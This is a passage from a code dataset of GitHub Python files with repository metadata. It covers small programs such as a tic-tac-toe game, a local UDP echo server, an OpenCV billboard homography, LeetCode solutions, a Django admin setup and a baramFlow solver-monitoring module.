if board[position] == \"-\":\r\n            valid = True\r\n        else: \r\n            print(\"invalid move, try again.\")\r\n\r\n    board[position] = player\r\n\r\n    display_board()\r\n\r\ndef check_gameover():\r\n    check_if_win()\r\n    check_if_draw()\r\n\r\ndef check_if_win():\r\n\r\n    global winner\r\n\r\n    # check rows\r\n    row_winner = check_rows()\r\n    \r\n    # check columns\r\n    columns_winner = check_columns()\r\n\r\n    # check diagonals\r\n    diagonal_winner = check_diagonals()\r\n\r\n    if row_winner:\r\n        winner = row_winner\r\n\r\n    elif columns_winner:\r\n        winner = columns_winner\r\n\r\n    elif diagonal_winner:\r\n        winner = diagonal_winner \r\n\r\n    return \r\n\r\ndef check_rows():\r\n    global game_on\r\n    row_1 = board[0] == board[1] == board[2] != \"-\"\r\n    row_2 = board[3] == board[4] == board[5] != \"-\"\r\n    row_3 = board[6] == board[7] == board[8] != \"-\"\r\n\r\n    if row_1 or row_2 or row_3:\r\n        game_on = False\r\n\r\n    if row_1:\r\n        return board[0]\r\n\r\n    elif row_2:\r\n        return board[3]\r\n\r\n    elif row_3:\r\n        return board[6] \r\n    return\r\n\r\ndef check_columns():\r\n    global game_on\r\n    column_1 = board[0] == board[3] == board[6] != \"-\"\r\n    column_2 = board[1] == board[4] == board[7] != \"-\"\r\n    column_3 = board[2] == board[5] == board[8] != \"-\"\r\n\r\n    if column_1 or column_2 or column_3:\r\n        game_on = False\r\n\r\n    if column_1:\r\n        return board[0]\r\n\r\n    elif column_2:\r\n        return board[1]\r\n\r\n    elif column_3:\r\n        return board[2] \r\n\r\n    return \r\n\r\ndef check_diagonals():\r\n    global game_on\r\n    diagonal_1 = board[0] == board[4] == board[8] != \"-\"\r\n    diagonal_2 = board[2] == board[4] == board[6] != \"-\"\r\n    \r\n    if diagonal_1 or diagonal_2:\r\n        game_on = False\r\n\r\n    if diagonal_1:\r\n        return board[0]\r\n\r\n    elif diagonal_2:\r\n        return board[2]\r\n    \r\n    return\r\n\r\ndef check_if_draw():\r\n    global game_on\r\n    if \"-\" not in board: \r\n        print(\"It's a draw\")  # I just put a simple print here\r\n        game_on = False\r\n    \r\n\r\n    return\r\n\r\ndef flip_player():\r\n    global current_player\r\n    if current_player == \"X\":\r\n        current_player = \"O\"\r\n    else:\r\n        current_player = \"X\"\r\n\r\n    return \r\nplay_game() ","repo_name":"Debendra-Shakya/tictactoeinPython","sub_path":"tic.py","file_name":"tic.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"1033513362","text":"# Difference between UDP and TCP:\n# the UDP protocol does not need to establish a connection, so it is fast (but unreliable)\nimport socket\n\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\ns.bind(('127.0.0.1', 9999))\n\nprint('Bind UDP on 9999...')\nwhile True:\n\t# receive data\n\tdata, addr = s.recvfrom(1024)\n\tprint('Received from %s:%s.' % addr)\n\ts.sendto(b'Hello,%s!' % data, addr)\n
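\n# A matching client would look like this (sketch, not part of the original file):\n#   c = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n#   c.sendto(b'Alice', ('127.0.0.1', 9999))\n#   print(c.recv(1024))  # b'Hello,Alice!'\n#   c.close()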
","repo_name":"553672759/xxgit","sub_path":"python/old/liaoxuefeng/UDPbiancheng.py","file_name":"UDPbiancheng.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"28992211364","text":"import cv2\r\nimport numpy as np\r\n\r\nbillboard = cv2.imread(\"billboard3.jpg\")\r\nbillboard_copy = billboard.copy()\r\nimage = cv2.imread(\"hadis2.jpg\")\r\n\r\n# Corner points found on the billboard and the corresponding image points\r\nbillboard_points = np.array([[136, 67], [490, 69], [487, 247], [138, 250]])\r\nimage_points = np.array([[0,0], [image.shape[1], 0], [image.shape[1], image.shape[0]], [0, image.shape[0]]])\r\n\r\n# find the homography matrix and warp the image onto the billboard\r\nmatrix_location, mask = cv2.findHomography(image_points, billboard_points)\r\nresult1 = cv2.warpPerspective(image, matrix_location, (billboard.shape[1], billboard.shape[0]))\r\n\r\n# Fill billboard with image\r\ncv2.fillConvexPoly(billboard_copy, billboard_points, 0, 16)\r\nresult2 = billboard_copy + result1\r\n\r\ncv2.imshow(\"billboard\", billboard)\r\ncv2.imshow(\"image\", image)\r\ncv2.imshow(\"result1\", result1)\r\ncv2.imshow(\"result2\", result2)\r\n\r\ncv2.imwrite(\"Banner_Picture.png\", result2)\r\n\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n\r\n","repo_name":"EmadOldin/Opencv_Project","sub_path":"Change_BillBoard(homography)2.2.py","file_name":"Change_BillBoard(homography)2.2.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} {"seq_id":"22219385766","text":"from tkinter import *\nimport random\nimport pandas as pd\ncard_num = 0\nBACKGROUND_COLOR = \"#B1DDC6\"\n\n\ndef reveal_meaning():\n    global card_num\n\n    next_button.grid_forget()\n    right_button.grid(row=1, column=1)\n    wrong_button.grid(row=1, column=0)\n    del_button.grid(row=1, column=0, columnspan=2)\n    card.itemconfig(card_img, image=card_back_img)\n    card.itemconfig(language, text=\"English\")\n    card.itemconfig(word, text=words_dict[card_num % len(words_dict)]['English'])\n\n    card_num += 1\n\n\ndef next_card():\n    card.itemconfig(card_img, image=card_front_img)\n    card.itemconfig(word, text=words_dict[card_num % len(words_dict)]['French'])\n    card.itemconfig(language, text=\"French\")\n    next_button.grid(row=1, column=0, columnspan=2)\n    right_button.grid_forget()\n    wrong_button.grid_forget()\n    del_button.grid_forget()\n\n\ndef delete_card():\n    global card_num\n\n    words_dict.remove(words_dict[card_num - 1])\n    print(words_dict)\n    pd.DataFrame(words_dict).to_csv(\"./data/unlearned_words.csv\", index=False)\n    card_num -= 1\n    next_card()\n\n\nwindow = Tk()\n\nwindow.title(\"Language Flash Cards\")\nwindow.config(padx=50, pady=50)\n\nwords = pd.read_csv(\"./data/unlearned_words.csv\")\nwords_dict = words.to_dict(orient=\"records\")\n\nrandom.shuffle(words_dict)\n\nprint(words_dict)\n\ncard = Canvas(width=800, height=526)\ncard_front_img = PhotoImage(file=\"./images/card_front.png\")\ncard_back_img = PhotoImage(file=\"./images/card_back.png\")\ncard_img = card.create_image(415, 250, image=card_front_img)\nlanguage = card.create_text(400, 150, text=\"French\", font=(\"Arial\", 40, \"italic\"))\nword = card.create_text(400, 283, text=words_dict[0]['French'], font=(\"Arial\", 60, \"bold\"))\ncard.grid(row=0, column=0, columnspan=2)\n\ncorrect_img = PhotoImage(file=\"./images/right.png\")\nright_button = Button(image=correct_img, command=next_card)\n\nwrong_img = PhotoImage(file=\"./images/wrong.png\")\nwrong_button = Button(image=wrong_img, command=next_card)\n\nnext_img = PhotoImage(file=\"./images/next.png\")\nnext_button = Button(image=next_img, command=reveal_meaning)\n\ndel_img = PhotoImage(file=\"./images/delete.png\")\ndel_button = Button(image=del_img, command=delete_card)\n\nnext_card()\n\nwindow.mainloop()\n","repo_name":"ZuhairQureshi/Python-Projects-100-Days","sub_path":"flash-card-project/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"43219742415","text":"# -*- coding: utf-8 -*-\r\n\r\ndef balancer(string_eval):\r\n\r\n    item_char_list = list(string_eval)\r\n    stack_list = []\r\n    num_par_open = item_char_list.count('(')\r\n    num_par_close = item_char_list.count(')')\r\n\r\n    list_of_indexes_open = []\r\n    list_of_indexes_close = []\r\n\r\n    if 
num_par_open != num_par_close:\r\n        print(\"The parentheses are not balanced\")\r\n    else:\r\n        index_pair = 0\r\n        # for valor in item_char_list:\r\n\r\n        for index_pair in range(len(item_char_list)):\r\n            if item_char_list[index_pair] == '(':\r\n                stack_list.append(item_char_list[index_pair])\r\n                # index_open += 1\r\n                # list_of_indexes_open.append(index_open)\r\n            elif item_char_list[index_pair] == ')' and len(stack_list) > 0:\r\n                stack_list.pop()\r\n                # index_close += 1\r\n                # list_of_indexes_close.append(index_close)\r\n\r\n    index_open = 0\r\n    index_close = 0\r\n\r\n    index_pair = 0\r\n\r\n    stack_balanced = [None] * len(string_eval*2)\r\n\r\n    for index_pair in range(len(item_char_list)):\r\n        if item_char_list[index_pair] == '(':\r\n            list_of_indexes_open.append(index_open)\r\n            index_open += 1\r\n        elif item_char_list[index_pair] == ')':\r\n            list_of_indexes_close.append(index_close)\r\n            index_close += 1\r\n\r\n    if num_par_open != num_par_close:\r\n        if num_par_open != len(list_of_indexes_close):\r\n            for i in list_of_indexes_open:\r\n                stack_balanced.append('(')\r\n                stack_balanced.remove(None)\r\n        elif num_par_open > 0:\r\n            for i in list_of_indexes_open:\r\n                stack_balanced[i] = '('\r\n                stack_balanced.remove(None)\r\n        else:\r\n            for item in item_char_list:\r\n                stack_balanced.append(item)\r\n                stack_balanced.remove(None)\r\n\r\n        if num_par_close != len(list_of_indexes_open):\r\n            for i in reversed(list_of_indexes_open):\r\n                stack_balanced.append(')')\r\n                stack_balanced.remove(None)\r\n        elif num_par_close > 0:\r\n            for i in list_of_indexes_close:\r\n                stack_balanced[i] = ')'\r\n                stack_balanced.remove(None)\r\n        else:\r\n            for item in item_char_list:\r\n                stack_balanced.append(item)\r\n                stack_balanced.remove(None)\r\n\r\n    parenthesis_balanced_string = \"\"\r\n\r\n    for item in stack_balanced:\r\n        if item is not None:\r\n            parenthesis_balanced_string += item\r\n\r\n    if len(stack_list) == 0:\r\n        print(\"The parentheses are balanced\")\r\n\r\n    print(\"num_char_open: \", num_par_open)\r\n    print(\"num_char_close: \", num_par_close)\r\n    print(\"stack_list: \", stack_list)\r\n    print(\"list_of_indexes: \\n open: {}, \\n closed: {}\".format(list_of_indexes_open, list_of_indexes_close))\r\n    # print(\"Stack_Balanced: \", stack_balanced)\r\n    print(\"String_Balanced: \", parenthesis_balanced_string)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n    # cadena = \"(((()))((((((()))))((()))(()())))((()))))))))))))))))\"\r\n    # cadena = \"(((((((((((((((((((())))))))))))))))))))\"\r\n    cadena = \"(()\"\r\n\r\n    balancer(cadena)\r\n","repo_name":"jorgeMorfinezM/parenthesis_balance_test","sub_path":"balanced_par.py","file_name":"balanced_par.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"74215301672","text":"# coding: utf-8\n\nimport sys \nreload(sys) \nsys.setdefaultencoding('utf-8') \n\nfrom django.contrib import admin\nfrom .models import Poem\nfrom django.contrib.auth.admin import UserAdmin\nfrom django.contrib.auth.models import User\n\n# subclass UserAdmin\nclass MyUserAdmin(UserAdmin):\n\t# fields to show in the change list\n\tlist_display = ('email','first_name','last_name', 'is_staff')\n\t# change-list filters\n\tlist_filter = ('is_staff', 'last_name')\n\n\tsearch_fields = ('last_name',)\n\n# unregister User first, then re-register it with MyUserAdmin\nadmin.site.unregister(User)\nadmin.site.register(User, MyUserAdmin)\n\n#class PoemModelAdmin(admin.ModelAdmin):\n#\tclass Meta:\n#\t\tmodel = Poem\n#\t# fields to display\n#\tlist_display = ['title', 'author']\n#\t# fields shown as links\n#\tlist_display_links = ['author']\n#\t# fields searchable via the search box\n#\tsearch_fields = ['title', 
'author']\n#\t# editable fields\n#\tlist_editable = ['title']\n#\t# fields usable as filters\n#\tlist_filter = ['author']\n#\n#\t# template used to render the change form\n#\tchange_form_template = 'change_form.html'\n#admin.site.register(Poem, PoemModelAdmin)\n\nfrom django import forms\nfrom .models import Poem\nfrom .forms import SetTypeForm\nfrom django.shortcuts import render\n# custom widget\nclass SubInputText(forms.TextInput):\n\tclass Media:\n\t\tcss = {\n\t\t\t'all':('input.css',)\n\t\t}\n\nclass PoemForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = Poem\n\t\tfields = ['author', 'title', 'type']\n\t\twidgets = {\n\t\t\t# render author as a textarea\n\t\t\t'author':forms.Textarea(attrs = {'cols':20, 'rows':1}),\n\t\t\t# use the custom SubInputText widget for title\n\t\t\t'title':SubInputText(),\n\t\t\t# render type as radio buttons\n\t\t\t'type':forms.RadioSelect,\n\t\t}\n\t\t\nclass PoemModelAdmin(admin.ModelAdmin):\n\t\n\t# custom action\n\tdef print_poem(self, request, queryset):\n\t\tfor qs in queryset:\n\t\t\tprint(qs)\n\t\n\tdef set_type(self, request, queryset):\n\t\tif request.POST.get('post'):\n\t\t\tform = SetTypeForm(request.POST)\n\t\t\tif form.is_valid():\n\t\t\t\ttype = form.cleaned_data['type']\n\t\t\t\tfor qs in queryset:\n\t\t\t\t\tqs.type = type \n\t\t\t\t\tqs.save()\n\t\t\t\t# success message shown after the action runs\n\t\t\t\tself.message_user(request, \"%d poems were changed to type %d\" % (len(queryset),type))\n\n\t\telse:\n\t\t\treturn render(request, 'set_type.html', {'form':SetTypeForm(initial={'_selected_action':request.POST.getlist(admin.ACTION_CHECKBOX_NAME)}),\n\t\t\t\t'objects':queryset})\n\t\t\t\n\t# remove unneeded global actions\n\tdef get_actions(self, request):\n\t\tactions = super(PoemModelAdmin, self).get_actions(request)\n\t\tif 'hello' in actions:\n\t\t\tdel actions['hello']\n\t\treturn actions\n\n\t# display name of the set_type action\n\tset_type.short_description = \"set_type_action\"\n\n\tform = PoemForm\n\tactions = [print_poem,set_type]\n\t# disable all actions\n\t#actions = None\nadmin.site.register(Poem, PoemModelAdmin)\n\n# add a global action\ndef sayHello(modelname, request, queryset):\n\tprint('hello')\nadmin.site.add_action(sayHello, 'hello')\n# globally disable an action\nadmin.site.disable_action('delete_selected')\n","repo_name":"cityking/python_07_custom_field","sub_path":"custom_field/fieldapp/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"38899239089","text":"# Source : https://leetcode.com/problems/is-graph-bipartite/description/\n\n# Algo/DS : Graph, BFS, Bipartite\n\n# Complexity : O(V+E)\n\nclass Solution(object):\n    def isBipartite(self, graph):\n        \"\"\"\n        :type graph: List[List[int]]\n        :rtype: bool\n        \"\"\"\n        \n        # set initial color for all to 0\n        color = [0] * len(graph)\n        visited = [False] * len(graph)\n        \n        # for loop is needed so that all disconnected nodes can be covered\n        for i in range(len(graph)):\n\n            # if already visited or no neighbor then skip this node\n            if visited[i] or len(graph[i]) == 0: continue\n            \n            # set color to 1 and start BFS\n            color[i] = 1\n            queue = [i]\n            while queue:\n                node = queue.pop(0)\n                visited[node] = True \n                for neigh in graph[node]:\n                    if color[neigh] == color[node]: return False\n\n                    # if neighbour is not visited then set color and add to queue\n                    if not visited[neigh]: \n                        color[neigh] = -color[node]\n                        queue.append(neigh)\n        \n        return True
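\n\n# Quick check (standard examples for this problem, not part of the submission):\n# graph = [[1,3],[0,2],[1,3],[0,2]] is an even cycle    -> True\n# graph = [[1,2,3],[0,2],[0,1,3],[0,2]] has an odd cycle -> False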
","repo_name":"neelamy/Leetcode","sub_path":"Graph/785_IsGraphBipartite?.py","file_name":"785_IsGraphBipartite?.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"23774248811","text":"'''\n4Sum II\n\nGiven four integer arrays nums1, nums2, nums3, and nums4 all of length n, return the number of tuples (i, j, k, l) such that:\n\n    0 <= i, j, k, l < n\n    nums1[i] + nums2[j] + nums3[k] + nums4[l] == 0\n\n \n\nExample 1:\n\nInput: nums1 = [1,2], nums2 = [-2,-1], nums3 = [-1,2], nums4 = [0,2]\nOutput: 2\nExplanation:\nThe two tuples are:\n1. (0, 0, 0, 1) -> nums1[0] + nums2[0] + nums3[0] + nums4[1] = 1 + (-2) + (-1) + 2 = 0\n2. (1, 1, 0, 0) -> nums1[1] + nums2[1] + nums3[0] + nums4[0] = 2 + (-1) + (-1) + 0 = 0\n\nExample 2:\n\nInput: nums1 = [0], nums2 = [0], nums3 = [0], nums4 = [0]\nOutput: 1\n\n \n\nConstraints:\n\n    n == nums1.length\n    n == nums2.length\n    n == nums3.length\n    n == nums4.length\n    1 <= n <= 200\n    -2^28 <= nums1[i], nums2[i], nums3[i], nums4[i] <= 2^28\n\n'''\nimport collections\nfrom collections import Counter, defaultdict\nfrom typing import List\n\nclass Solution:\n    def fourSumCount(self, nums1: List[int], nums2: List[int], nums3: List[int], nums4: List[int]) -> int:\n        count = 0\n        num1_2 = {}\n        for num1 in nums1:\n            for num2 in nums2:\n                num1_2[num1+num2] = num1_2.get(num1+num2, 0) + 1\n        for num3 in nums3:\n            for num4 in nums4:\n                if -(num3+num4) in num1_2:\n                    count += 1*num1_2[-(num3+num4)]\n        return count\n\n# leetcode, fastest\nclass Solution:\n    def fourSumCount(self, nums1: List[int], nums2: List[int], nums3: List[int], nums4: List[int]) -> int:\n        counter1 = Counter(nums1)\n        counter2 = Counter(nums2)\n        counter3 = Counter(nums3)\n        counter4 = Counter(nums4)\n\n        ans = 0\n\n        counterA = defaultdict(int)\n        for n1, cnt1 in counter1.items():\n            for n2, cnt2 in counter2.items():\n                counterA[n1+n2] += cnt1 * cnt2\n        counterB = defaultdict(int)\n        for n3, cnt3 in counter3.items():\n            for n4, cnt4 in counter4.items():\n                counterB[n3+n4] += cnt3 * cnt4\n\n        for n1n2, cntA in counterA.items():\n            if -n1n2 in counterB:\n                ans += cntA * counterB[-n1n2]\n\n        return ans\n\n# Stefan Pochmann\ndef fourSumCount(self, A, B, C, D):\n    AB = collections.Counter(a+b for a in A for b in B)\n    return sum(AB[-c-d] for c in C for d in D)\n\n\nnums1 = [1,2]\nnums2 = [-2,-1]\nnums3 = [-1,2]\nnums4 = [0,2]\n# Output: 2\n\n# nums1 = [0]\n# nums2 = [0]\n# nums3 = [0]\n# nums4 = [0]\n# # Output: 1\n\nnums1 = [-1,-1]\nnums2 = [-1,1]\nnums3 = [-1,1]\nnums4 = [1,-1]\n#Output: 6\n\nsol = Solution()\nprint(sol.fourSumCount(nums1, nums2, nums3, nums4))\n","repo_name":"jomesh18/Leetcode","sub_path":"Hash Table/fourSumCount.py","file_name":"fourSumCount.py","file_ext":"py","file_size_in_byte":2454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"70716293033","text":"# Data Generator\n# Imports added for completeness; the keras import assumes a TF2-style install,\n# a standalone keras install works the same way.\nimport os\nimport random\n\nimport numpy as np\nimport pydicom\nfrom skimage.transform import resize\nfrom tensorflow import keras\n\nclass generator(keras.utils.Sequence):\n\n    def __init__(self, folder, filenames, pneumonia_locations=None, batch_size=32,\n                 image_size=256, shuffle=True, augment=False, predict=False):\n        self.folder = folder\n        self.filenames = filenames\n        self.pneumonia_locations = pneumonia_locations\n        self.batch_size = batch_size\n        self.image_size = image_size\n        self.shuffle = shuffle\n        self.augment = augment\n        self.predict = predict\n        self.on_epoch_end()\n\n    def __load__(self, filename):\n        # load dicom images into np.array\n        img = pydicom.dcmread(os.path.join(self.folder, filename)).pixel_array\n\n        # create empty mask\n        msk = np.zeros(img.shape)\n        filename = filename.split('.')[0]\n\n        # if img contains pneumonia\n        
if filename in self.pneumonia_locations:\n            for location in self.pneumonia_locations[filename]:\n                x,y,w,h = location\n                msk[y:y+h, x:x+w] = 1\n\n        img = resize(img, (self.image_size, self.image_size), mode='reflect')\n        msk = resize(msk, (self.image_size, self.image_size), mode='reflect') > 0.5\n\n        if self.augment and random.random() > 0.5:\n            img = np.fliplr(img)\n            msk = np.fliplr(msk)\n\n        # add trailing channel dimension\n        img = np.expand_dims(img, -1)\n        msk = np.expand_dims(msk, -1)\n        return img, msk\n\n    def __loadpredict__(self, filename):\n        img = pydicom.dcmread(os.path.join(self.folder, filename)).pixel_array\n        img = resize(img, (self.image_size, self.image_size), mode='reflect')\n        img = np.expand_dims(img, -1)\n        return img\n\n    def __getitem__(self, index):\n        filenames = self.filenames[index*self.batch_size:(index+1)*self.batch_size]\n\n        if self.predict:\n            # load files\n            imgs = [self.__loadpredict__(filename) for filename in filenames]\n            # create np batch\n            imgs = np.array(imgs)\n            return imgs, filenames\n\n        # train mode: return imgs & masks\n        else:\n            # load files\n            items = [self.__load__(filename) for filename in filenames]\n            # unzip imgs and msks\n            imgs, msks = zip(*items)\n            # create np batch\n            imgs = np.array(imgs)\n            msks = np.array(msks)\n            return imgs, msks\n\n    def on_epoch_end(self):\n        if self.shuffle:\n            random.shuffle(self.filenames)\n\n    def __len__(self):\n        if self.predict:\n            # return everything\n            return int(np.ceil(len(self.filenames)/self.batch_size))\n        else:\n            # return full batches only\n            return int(len(self.filenames)/self.batch_size)
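\n\n# Usage sketch (hypothetical names, not part of the original file):\n#   train_gen = generator('stage_1_train_images', train_filenames,\n#                         pneumonia_locations, batch_size=32,\n#                         image_size=256, shuffle=True, augment=True)\n#   model.fit(train_gen, epochs=10)  # any keras.Model with a matching input shape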
","repo_name":"jumbobae/Pneumonia_Detection_CNN","sub_path":"utils/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":2760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"11687901356","text":"lines = open(\"/proc/net/dev\", \"r\").readlines()\n\ncolumnLine = lines[1]\n_, receiveCols , transmitCols = columnLine.split(\"|\")\nreceiveCols = list(map(lambda a: \"recv_\"+a, receiveCols.split()))\ntransmitCols = list(map(lambda a: \"trans_\"+a, transmitCols.split()))\n\ncols = receiveCols+transmitCols\n\nfaces = {}\nfor line in lines[2:]:\n    if line.find(\":\") < 0: continue\n    face, data = line.split(\":\")\n    faceData = dict(zip(cols, data.split()))\n    faces[face.strip()] = faceData\n\nimport pprint\npprint.pprint(faces)\n","repo_name":"wiliamsouza/playground","sub_path":"proc_net_dev.py","file_name":"proc_net_dev.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} {"seq_id":"23029428155","text":"import logging as log\nimport multiprocessing as mp\nimport os\nimport sys\nfrom tqdm import tqdm\n\n# Local modules\nsys.path.append(\"..\")  # Use the modules in the top level directory\nimport Analysis.ResultSummary as ARS\nimport MultiProc.ConfigHelp as MPCH\nimport IO.MultiResultReader as IOMRR\nimport IO.NamingConventions as IONC\nimport Plotting.DefaultFormat as PDF\nimport Plotting.SetupPlotting as PSP\n\n\"\"\" Create the individual summary plots for each result, e.g. the covariance \n    matrix, the fit behaviour, the individual parameter plots, ...\n\"\"\"\n\nlog.basicConfig(level=log.INFO)  # Set logging level\nos.environ[\"USE_N_CORES\"] = \"10\"\n\noutput_base = \"../../../output\"\nfit_output_base = \"{}/run_outputs\".format(output_base)\nmsr = IOMRR.get_default_mrr(fit_output_base)\n\n# Output directories\nplot_base = \"{}/plots\".format(output_base)\n\n# Set the default matplotlib formatting\nPDF.set_default_mpl_format()\n\n# Create summary plots for each result (using parallel programming)\nos.environ[\"USE_N_CORES\"] = \"4\"  # Reduce the number of cores (goes crazy else)\npool = mp.Pool(MPCH.get_n_cores())\nresult_objects = []\n\nlog.info(\"Starting processes to create plots for each setup.\")\nfor res in tqdm(msr.setup_results):\n    setup_out_name = IONC.setup_convention(res.lumi_setup, res.run_setup, \n                                           res.muacc_setup, res.difparam_setup,\n                                           res.WW_setup)\n    log.debug(\"Checking: {}\".format(setup_out_name))\n    \n    # Calculate a summary of the result (e.g. cor matrix, unc., ...)\n    res_summary = ARS.ResultSummary(res.run_result)\n    \n    # Create all the summary plots for this setup (in a parallel process)\n    plot_dir = \"{}/SingleSetup/{}\".format(plot_base, setup_out_name)\n    result_objects.append(\n        pool.apply_async(PSP.plot_res_summary, args=(res_summary, plot_dir)))\n    \n# \"get\" the results to get a tqdm counter of them finishing\nlog.info(\"Running processes.\")\nfor r in tqdm(result_objects):\n    _ = r.get()\n    \n# Let all processes finish\npool.close()\npool.join()\nlog.info(\"Done!\")","repo_name":"beyerja/PrEWMultiSetupTest","sub_path":"analysis/py/Results/CreateIndividualSummaryPlots.py","file_name":"CreateIndividualSummaryPlots.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"74585747113","text":"# -*- Mode: python; py-indent-offset: 4; indent-tabs-mode: nil; coding: utf-8; -*-\n\ntop = '..'\n\ndef build(bld):\n\n    for app in ['icear-ca', 'icear-mt']:\n        bld(features='cxxprogram cxx',\n            target='../bin/%s' % app,\n            source=bld.path.ant_glob(['%s/*.cpp' % app]),\n            use='ndn-cert')\n","repo_name":"danameme/ndncert","sub_path":"apps/wscript","file_name":"wscript","file_ext":"","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} {"seq_id":"73285225833","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport time\n\nimport pandas as pd\nfrom PySide6.QtCore import QThread, QObject, QTimer, Signal, Qt\n\nfrom baramFlow.coredb import coredb\nfrom baramFlow.coredb.project import Project\nfrom baramFlow.coredb.monitor_db import MonitorDB\nfrom baramFlow.coredb.general_db import GeneralDB\nfrom baramFlow.coredb.run_calculation_db import RunCalculationDB\nfrom baramFlow.coredb.monitor_db import FieldHelper\nfrom baramFlow.coredb.boundary_db import BoundaryDB\nfrom baramFlow.coredb.cell_zone_db import CellZoneDB\nfrom baramFlow.openfoam.post_processing.post_file_reader import PostFileReader\n\n\ndef calculateMaxX():\n    if GeneralDB.isTimeTransient():\n        # 10% of total case time\n        endTime = float(coredb.CoreDB().getValue(RunCalculationDB.RUN_CALCULATION_XPATH + '/runConditions/endTime'))\n        maxX = endTime / 10\n    else:\n        # 10% of total iteration count, or the full iteration count if it is less than MIN_COUNT\n        MIN_COUNT = 100\n        count = int(\n            coredb.CoreDB().getValue(RunCalculationDB.RUN_CALCULATION_XPATH + '/runConditions/numberOfIterations'))\n        if count < MIN_COUNT:\n            maxX = count\n        else:\n            maxX = 
MIN_COUNT + count / 10\n\n return maxX\n\n\nclass Worker(QObject):\n dataUpdated = Signal(pd.DataFrame)\n stopped = Signal()\n flushed = Signal()\n\n def __init__(self, name):\n super().__init__()\n self._project = Project.instance()\n self._name = name\n self._reader = None\n self._timer = None\n\n def createReader(self, rname, fileName, extension):\n self._reader = PostFileReader(self._name, rname, fileName, extension)\n\n def startMonitor(self):\n changedFiles = self._reader.chagedFiles()\n while not changedFiles and self._project.isSolverRunning():\n time.sleep(0.5)\n changedFiles = self._reader.chagedFiles()\n\n if changedFiles:\n for path in changedFiles[1:]:\n data = self._reader.readDataFrame(path)\n self.dataUpdated.emit(data)\n\n self._reader.openMonitor()\n self._monitor()\n\n self.flushed.emit()\n\n if self._project.isSolverRunning():\n self._timer = QTimer()\n self._timer.setInterval(500)\n self._timer.timeout.connect(self._monitor)\n self._timer.start()\n else:\n self._reader.closeMonitor()\n\n def stopMonitor(self):\n if self._timer:\n self._timer.stop()\n self._timer = None\n self._monitor()\n self._reader.closeMonitor()\n self.stopped.emit()\n\n def _monitor(self):\n data = self._reader.readTailDataFrame()\n if data is not None:\n self.dataUpdated.emit(data)\n\nclass Monitor(QObject):\n startWorker = Signal()\n stopWorker = Signal()\n stopped = Signal(str)\n\n def __init__(self, name):\n super().__init__()\n\n self._db = coredb.CoreDB()\n self._name = name\n self._rname = ''\n self._thread = None\n self._worker = None\n self._showChart = True\n self._running = False\n\n @property\n def name(self):\n return self._name\n\n @property\n def fileName(self):\n return None\n\n @property\n def extension(self):\n return '.dat'\n\n def visibility(self):\n return self._showChart\n\n def startThread(self):\n self._thread = QThread()\n self._worker = Worker(self.name)\n self._worker.moveToThread(self._thread)\n self._worker.createReader(self._rname, self.fileName, self.extension)\n self._worker.dataUpdated.connect(self._updateChart, type=Qt.ConnectionType.QueuedConnection)\n self._worker.stopped.connect(self._stopped, type=Qt.ConnectionType.QueuedConnection)\n self._worker.flushed.connect(self._fitChart, type=Qt.ConnectionType.QueuedConnection)\n\n self._thread.started.connect(self._worker.startMonitor, type=Qt.ConnectionType.QueuedConnection)\n self._thread.start()\n\n self.startWorker.connect(self._worker.startMonitor, type=Qt.ConnectionType.QueuedConnection)\n self.stopWorker.connect(self._worker.stopMonitor, type=Qt.ConnectionType.QueuedConnection)\n\n def start(self):\n if self._worker:\n self.startWorker.emit()\n else:\n self.startThread()\n\n self._running = True\n\n def stop(self):\n self._running = False\n self.stopWorker.emit()\n\n def quit(self):\n self.stop()\n if self._thread:\n self._thread.quit()\n self._thread.wait()\n self._thread = None\n\n def _updateChart(self, data):\n pass\n\n def _fitChart(self):\n pass\n\n def _stopped(self):\n self.stopped.emit(self._name)\n\nclass ForceMonitor(Monitor):\n def __init__(self, name, chart1, chart2, chart3):\n super().__init__(name)\n\n xpath = MonitorDB.getForceMonitorXPath(name)\n\n self._showChart = self._db.getValue(xpath + '/showChart') == 'true'\n self._rname = self._db.getValue(xpath + '/region')\n self._chart1 = chart1\n self._chart2 = chart2\n self._chart3 = chart3\n\n chart1.setTitle(f'{name} - Cd')\n chart2.setTitle(f'{name} - Cl')\n chart3.setTitle(f'{name} - Cm')\n\n @property\n def fileName(self):\n return 
